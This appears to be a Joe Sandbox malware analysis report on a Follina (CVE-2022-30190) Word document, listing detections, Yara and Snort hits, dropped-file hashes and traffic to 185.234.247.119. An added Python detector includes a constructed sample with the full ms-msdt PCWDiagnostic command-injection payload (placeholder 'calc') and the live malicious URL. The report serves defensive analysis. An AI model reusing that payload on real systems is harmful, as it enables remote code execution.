Analysis Report: doc782.docx
Platform: Windows
Overview
General Information
Detection
Follina CVE-2022-30190
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
- Multi AV Scanner detection for submitted file
- Yara detected Microsoft Office Exploit Follina CVE-2022-30190
- Snort IDS alert for network traffic
- Contains an external reference to another file
- Yara signature match
- Potential document exploit detected (unknown TCP traffic)
- Uses a known web browser user agent for HTTP communication
- Internet Provider seen in connection with other malware
- Potential document exploit detected (performs HTTP gets)
- Document misses a certain OLE stream usually present in this Microsoft Office document type
Process Tree
- System is w7x64
- WINWORD.EXE (PID: 1168, cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup

Only WINWORD.EXE appears in the tree; no msdt.exe child is recorded, and the cookbook excluded dllhost.exe and rundll32.exe from analysis. The exploitation evidence in this run is therefore the document's external reference, the content fetched from 185.234.247.119 and the Yara and Snort matches on that content, not an observed payload.
Malware Configuration: no configs have been found.
Yara Overview
Rule | Description | Author |
---|---|---|
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |

Both rules matched repeatedly across the analysed files; the per-file hits are listed with the dropped files below.
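Both rules fire on the two observations the Signatures list records: the document contains an external reference to another file, and the content it fetches carries an ms-msdt: URI. The Python below is an added example, not the code of either Yara rule and not part of the report: it checks a .docx for an oleObject relationship whose target is an http(s) URL and scans a fetched body for the ms-msdt pattern. The document and HTML it inspects are constructed inline (the relationship target is the URL the report records as the IE cache URL; the HTML is modelled on public descriptions of the Follina loader, with a harmless placeholder command), and the two regexes are this example's own indicators rather than the rules' strings.

```python
"""Added example: two of the observations the report's signatures record,
reproduced as stand-alone checks. Not code from Joe Sandbox or the Yara
rule authors; the sample document and HTML are constructed below."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
)

# This example's own indicators, modelled on public reporting of
# CVE-2022-30190; they are not the strings of the Yara rules above.
MSDT_URI = re.compile(r"ms-msdt:\s*/id\s+PCWDiagnostic", re.IGNORECASE)
MSDT_INJECT = re.compile(r"IT_BrowseForFile=\$\(", re.IGNORECASE)


def external_relationships(docx_bytes: bytes) -> list:
    """(type, target) of every relationship of the main document part whose
    TargetMode is External, i.e. a reference outside the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        rels_path = "word/_rels/document.xml.rels"
        if rels_path not in package.namelist():
            return found
        root = ET.fromstring(package.read(rels_path))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("TargetMode", "Internal") == "External":
                found.append((rel.get("Type", ""), rel.get("Target", "")))
    return found


def has_remote_oleobject(docx_bytes: bytes) -> bool:
    """The 'external reference to another file' signal: an embedded OLE
    object whose relationship target is an http(s) URL."""
    return any(
        rtype == OLE_REL_TYPE and re.match(r"https?://", target, re.IGNORECASE)
        for rtype, target in external_relationships(docx_bytes)
    )


def has_msdt_uri(body: str) -> bool:
    """The ms-msdt signal in fetched content: the PCWDiagnostic troubleshooter
    invoked with a command substitution injected into IT_BrowseForFile."""
    return bool(MSDT_URI.search(body) and MSDT_INJECT.search(body))


def build_sample_docx(target: str, external: bool = True) -> bytes:
    """Constructed minimal .docx containing only the parts the checks read."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<w:document/>")
        package.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Relationship target taken from the report's IE cache URL.
SAMPLE_DOCX = build_sample_docx("http://185.234.247.119/123.RES")

# Constructed stand-in for the fetched .RES page; 'calc' is a placeholder
# for whatever a real loader would run. Only the URI shape matters here.
SAMPLE_HTML = r'''<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
</script></body></html>'''

if __name__ == "__main__":
    print("remote oleObject relationship:", has_remote_oleobject(SAMPLE_DOCX))
    print("ms-msdt URI in fetched body:", has_msdt_uri(SAMPLE_HTML))
```

The document check needs only the package, so it runs on mail-gateway or EDR file events before anything is fetched; the body check is what the Snort signature and the Yara rule do on the wire and on the cached .RES copies respectively. Requiring both the PCWDiagnostic troubleshooter and the `IT_BrowseForFile=$(` substitution keeps ordinary ms-msdt help links out of the hit list.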
No Sigma rule has matched.

Snort IDS Alert
Timestamp: | 06/07/22-19:44:37.058628 |
SID: | 2036726 |
Message: | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) |
Source IP: | 185.234.247.119 |
Source Port: | 80 |
Destination IP: | 192.168.2.22 |
Destination Port: | 49171 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Signature Details

AV Detection
- Virustotal: detection (see the Antivirus table below)
- ReversingLabs: detection (see the Antivirus table below)

Exploits
- File source: 4 entries
- File opened: 1 entry
- TCP traffic: 2 entries

Networking
- Snort IDS: ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190), SID 2036726
- HTTP traffic detected: 2 entries
- ASN Name: INTERKONEKT-ASPL (AS198004)
- TCP traffic detected without corresponding DNS query: 32 entries, all to 185.234.247.119 (the only contacted IP; no contacted domains)
- String found in binary or memory: 4 entries

Other Sources
- File created: 3 entries
- HTTP traffic detected: 2 entries
- Matched rule: 4 entries
- OLE stream indicators for Word, Excel, PowerPoint, and Visio
- Virustotal, ReversingLabs
- LNK file
- Classification label: mal68.expl.evad.winDOCX@1/18@0/1
- OLE document summary: 3 entries
- File read
- Window detected
- Key opened
- File opened
- Initial sample

Persistence and Installation Behavior
- Extracted files from sample
- Process information set: 64 entries
MITRE ATT&CK Matrix (techniques with mapped signatures; the number is how many signatures mapped to the technique)
Tactic | Technique | Signatures |
---|---|---|
Execution | Exploitation for Client Execution | 2 |
Defense Evasion | Masquerading | 1 |
Discovery | File and Directory Discovery | 1 |
Discovery | System Information Discovery | 1 |
Command and Control | Non-Application Layer Protocol | 1 |
Command and Control | Application Layer Protocol | 11 |
Command and Control | Ingress Tool Transfer | 2 |
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label |
---|---|---|---|
doc782.docx | 27% | Virustotal | |
doc782.docx | 17% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444 |

The ReversingLabs label names CVE-2021-40444 (MSHTML) rather than CVE-2022-30190. Both chains start from a .docx whose oleObject relationship points at an external URL, so a generic signature for that structure fires on either; the ms-msdt indicators in the Yara and Snort matches are what tie this sample to Follina.

Dropped Files: no Antivirus matches.
Unpacked PE Files: no Antivirus matches.
Domains: no Antivirus matches.

URLs
Source | Detection | Scanner | Label |
---|---|---|---|
 | 0% | Avira URL Cloud | safe |
 | 0% | Avira URL Cloud | safe |
 | 0% | Avira URL Cloud | safe |
 | 0% | Avira URL Cloud | safe |

A "safe" URL reputation is a verdict on the URL string, not on what it served: the content fetched from http://185.234.247.119/123.RES is flagged malicious in the dropped-files list below.
Contacted Domains: none.

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | true | | unknown |

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | unknown |
 | | true | | low |
 | | false | | unknown |
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
185.234.247.119 | unknown | Russian Federation | 198004 | INTERKONEKT-ASPL | true |
General Information
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 640940 |
Start date and time: | 2022-06-07 19:43:37 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | doc782.docx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 4 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.expl.evad.winDOCX@1/18@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtQueryAttributesFile calls found.
No simulations.

Created / dropped Files

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2872757882299728 |
Encrypted: | false |
SSDEEP: | 192:y1gV9sJSP4VfWbgIvNmujrzzZxpFcPX/QoZxpFcPX/QN:RRc16Xcf |
MD5: | 526A6E497879064B79111F0EB079DC69 |
SHA1: | A0C1A4BA670B7640F1373BE69695CBB8D29602EF |
SHA-256: | BE1B8CE88A7FC126829F25E065A41BB623E975860C50196F9DEA860CA5683A48 |
SHA-512: | E7B903BAAA54CC700553DD777E855EEBC9D32C38A17FC9CDED800C74C63671EFEF1503DAD239CE059AD404FCEBE58FAD3FB5740B6A3078B21A553C1E1C02A2B0 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{90C60528-C98F-4BCE-9AB0-F5E79340A27B}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6736203037253643 |
Encrypted: | false |
SSDEEP: | 96:KTCyVFL4PGgYQIoGGXbMXGFIFiwLi9QtOwHtONXYhO4Y/:AbUPeQxGukLnhao |
MD5: | 121BD5A641D1017667991A6BED089C9D |
SHA1: | C24150EEA5B9FAAF4EA85883F4A2010E848F1258 |
SHA-256: | 8B2A4158CC6A2D08336F295074C4722095EFDE1513079CA76C7DCDDCD0CF40C6 |
SHA-512: | DF37BF55F2CA4ED734FC35B80BFF71D0D8910874E0D5A45A493310FF5A61A687418FFB87BD0EFE4139B30D9C70FB73B5C73D93E2F83673E1E30FE853763E05A4 |
Malicious: | false |
Reputation: | low |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9891611412909485 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzLPlQ3IlFZYDn03cEVS5fIfRP+l1gYlRZ276:yPblzJQ3IlbYD03cxxIfwl1gYDZ22 |
MD5: | CCB1ED79CC6852066844CFAB96D39ED6 |
SHA1: | 4D72D31AF6234AECC4EE48EFF6E3BEAE916EF0BD |
SHA-256: | 89EE3B6935806462AD3FD99A239D72CBCED744D8EF1506C3240FA0E916A8555B |
SHA-512: | 055E3D280BEBA5DD41D25A429DBA3D40FDA5AF560804FC7E5C397BA1D70291746D03D7176D96039151F5C995FF89FF7EA93024648F61AC15968F7F6E0ED31B6C |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2885187828602524 |
Encrypted: | false |
SSDEEP: | 48:I3HCRBFG2NYJDWfDU/YCSY41oUi+ztEVXIeChj32glRrYOL0MNW9Rc5qpHWumB5w:KHCLFXO1amSBg8NyKINyK7H |
MD5: | 317DE8F3926F423F05DF5364DB71FEE7 |
SHA1: | DB169996DE45337D8A0C1A97B0EC5DAEA96D2A4C |
SHA-256: | D6F1A882FCD48BF3D86FA004105B84A1BEC310411E6BAA7C444E63414F2308FA |
SHA-512: | FCB7FA607792872C0848E5085E12F3C5690EC319EA3DBE1C5FDE6E19C67D0C7867DE70A57B68BDD0EEDD8B3579AF7C62166AEB68E88BC9B6BE374E532F3F9327 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4A9BEEDA-1620-41EC-85E7-8F2F9F4B21C8}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22152754214705603 |
Encrypted: | false |
SSDEEP: | 24:I3Ca2rcLwnM0B34x6xPXFQfE+a3AmFHD0TXJFFmZ7fhmABvDzCARnZzqZzV6Egjt:I3Ca2AUrB1FJfT3Hja/C6SzsnIsnw |
MD5: | 9D421CB4E95C534AFA4DF087D46B16C6 |
SHA1: | A552DBB3209497D1246753410028BC8AA300BE05 |
SHA-256: | DD78DDB4B96B4CEAFDCB4FC5720419CAB5F873AC58E3CC4350F94C9B6B2E348E |
SHA-512: | C3FF9888E2D64382B2FE5AB75DBD545B28B8CA0082ABF4FC0DC7480276544BBA3E21FF64625E9167FA844BA25024359205A87829A156D119C6D53D09F02F24FA |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9727198870722877 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzCROa55VlJQwXuZ1jyjlRV8S27276:yPblzCR75B/E4ZIh22 |
MD5: | FF0683B5DA4293A1DE54EDCB8D4E8C1A |
SHA1: | 58322D98937093F90642D2220C7A4A1318A4629B |
SHA-256: | 30434BFC15C74DFA64C6C8DB56C4118A9D99D913B6578D04A1825DF5CF27B2DF |
SHA-512: | 2BD5A3A95B1F607F1065F74EB1FED9EBF3EA7B7C91388E15E090644E30D875E21AEF4ADE4F8122596AEE6CB9DAA490C7E1DB3C53E80BA92AD1100799AED988EA |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | downloaded |
Size (bytes): | 6241 |
Entropy (8bit): | 4.836014560592255 |
Encrypted: | false |
SSDEEP: | 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47 |
MD5: | A32050027AEA96B3B70E1056490A98C9 |
SHA1: | EF28C67583C8C8048C0BAAEAD036680A60441213 |
SHA-256: | E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433 |
SHA-512: | 1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C |
Malicious: | true |
Yara Hits: | see Yara Overview above |
Reputation: | low |
IE Cache URL: | http://185.234.247.119/123.RES |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 6241 |
Entropy (8bit): | 4.836014560592255 |
Encrypted: | false |
SSDEEP: | 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47 |
MD5: | A32050027AEA96B3B70E1056490A98C9 |
SHA1: | EF28C67583C8C8048C0BAAEAD036680A60441213 |
SHA-256: | E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433 |
SHA-512: | 1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C |
Malicious: | true |
Yara Hits: | see Yara Overview above |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 6241 |
Entropy (8bit): | 4.836014560592255 |
Encrypted: | false |
SSDEEP: | 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47 |
MD5: | A32050027AEA96B3B70E1056490A98C9 |
SHA1: | EF28C67583C8C8048C0BAAEAD036680A60441213 |
SHA-256: | E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433 |
SHA-512: | 1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C |
Malicious: | true |
Yara Hits: | see Yara Overview above |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 5632 |
Entropy (8bit): | 2.2195179903071636 |
Encrypted: | false |
SSDEEP: | 12:rl3bn+kF/W/mYYaiT21U/hC9KSvuQWyRnNYnRn/5Co00RnNEKn7iv9KS4CI9KS4y:rdW/NK/5QV8nNoWisg6BAKoG8noxoWi |
MD5: | 3AB3539B70A9B80798F3669AC3483546 |
SHA1: | 346E40AF0E4E582BD90E166E57A8B3A170AC4565 |
SHA-256: | 5DBE81D54C8C3CF70075824A503914BC1C8240574AA22AB7C7B7BC63E1DDD654 |
SHA-512: | A407CB94888C76D85D50239C97A6CE89BBDB5EEC8FDB5792EEF8FFE56B6110BFF2E86AECC0B7B2C765AFC91BA3A30B3426659E705919BE960A4D37A5118FE40C |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2921E275-B8BF-45B2-888A-BDBD2D0A4929}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77318D9D-F0AF-4DD2-B489-88A56CEFB392}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 2130 |
Entropy (8bit): | 1.1627960907898713 |
Encrypted: | false |
SSDEEP: | 6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1PcV5:mbb2sOhYk5vnZA5Rn/YnRn/dom5 |
MD5: | 645EA66E0489C4D8B0D4877F7A930E07 |
SHA1: | 2961C4A1FDD07A4A6EFA47655C6087EB011B079E |
SHA-256: | ED0BFA2837448DD790D7C0450339FBAEF480535517847634136BF9F7F0B91468 |
SHA-512: | 0D1E3C8280255B0F329931CE8CE1810DFE32F5DA29A2FD9FE90B907A2546699B955D50519CE310BD63B5D84F5873F5FB3CCB0467FB48E47ABEA16962DC6BAACE |
Malicious: | false |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025623734588153504 |
Encrypted: | false |
SSDEEP: | 6:I3DPc1V27HvxggLRvhGEAflWSks3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPwuDhGEAfASk6vYg3J/ |
MD5: | B0EA46CCC2FA72CDEA1E8A970318C8C5 |
SHA1: | E8BB6DFCD4C726B015778B573CE00F8A98D190F7 |
SHA-256: | 85EA4C6C1662274426EAFFE8C190A6F109D86DDF4021D8E4A9E3198F36A551A4 |
SHA-512: | 62C38D380B430EDE994AA1561EE4CC07FD30D99D272A91D8F15B015CDA636C46605A83244CCDE01E87A132F325C7F9EB385AE7B2A9E981A845D8EB1F0B9449D8 |
Malicious: | false |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.0256237345881535 |
Encrypted: | false |
SSDEEP: | 6:I3DPcbYRvxggLRPqv5ibXbGRXv//4tfnRujlw//+GtluJ/eRuj:I3DPGYdjy5vYg3J/ |
MD5: | 10E67C048099C90E1C0666278470E38A |
SHA1: | D5A7F4B209F9732FB77E86F8A668E1512D66C2DB |
SHA-256: | D8392841A423C66EA19FB60EA4E550FD547DE47B6A66521A05CB3FCFC5E83492 |
SHA-512: | BB2C07BF757A5CD6A874F60DD91605CC4C83918A43623466F649DD63BAE75340B2B203EFEBA155C96EEB0E22F4623A82E0D7C3382522046EC7F63302BCC8CAF1 |
Malicious: | false |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 999 |
Entropy (8bit): | 4.520744870739846 |
Encrypted: | false |
SSDEEP: | 12:8nlrgXg/XAlCPCHaXWBlXB/eLX+WqPW/xgitCicvbz6F42NDtZ3YilMMEpxRljK1:8f/XTm3MgPW/xftJekxDv3qa+Y7h |
MD5: | 04594E11A8EF65860D389E40AB032796 |
SHA1: | AA6792F586717AD57B20FD67B505E50D5AE0E5A3 |
SHA-256: | 1BC5F3C148CE6BAFA95337883CC3B042968CD04F3BF61453FC99D46199056D8B |
SHA-512: | 049D931F8E51E9573F8B459018770975916EE6A87B1E9606BC89247CD8875C3FA9D77557D196DA4FE827AC8F3171DD6A37007FB2BABEB910FA872C01A4CDF0BA |
Malicious: | false |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 4.601202445739505 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c |
MD5: | 538F5016C24249AC1799BBBB20B4BD97 |
SHA1: | 1B0ECD98E7D3BFECA78B00528138FA8D84F35BED |
SHA-256: | 249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F |
SHA-512: | E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA |
Malicious: | false |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | false |

(file path not preserved)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | true |

Static File Info
Entropy (8bit): | 7.869060797789825 |
File name: | doc782.docx |
File size: | 10144 |
MD5: | e7015438268464cedad98b1544d643ad |
SHA1: | 03ef0e06d678a07f0413d95f0deb8968190e4f6b |
SHA256: | d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93 |
SHA512: | d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad |
SSDEEP: | 192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2 |
TLSH: | A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C |
File Content Preview: | PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Snort IDS Alerts
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/07/22-19:44:37.058628 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |

The alert matched the server's response to the second request on session 49171 (19:44:37, see the HTTP data rows below), not the first exchange at 19:44:27 on the same connection.
TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 7, 2022 19:44:27.159992933 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:27.187441111 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:27.187530041 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:27.187803030 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:27.215111017 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:27.215137959 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:27.215202093 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.657025099 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.684343100 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:32.684530973 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.684813023 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.716893911 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:32.718305111 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:32.926908970 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.916021109 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.943603992 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:36.943826914 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.961354017 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.991600990 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:36.991637945 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.030510902 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058628082 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058744907 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058758974 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058788061 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
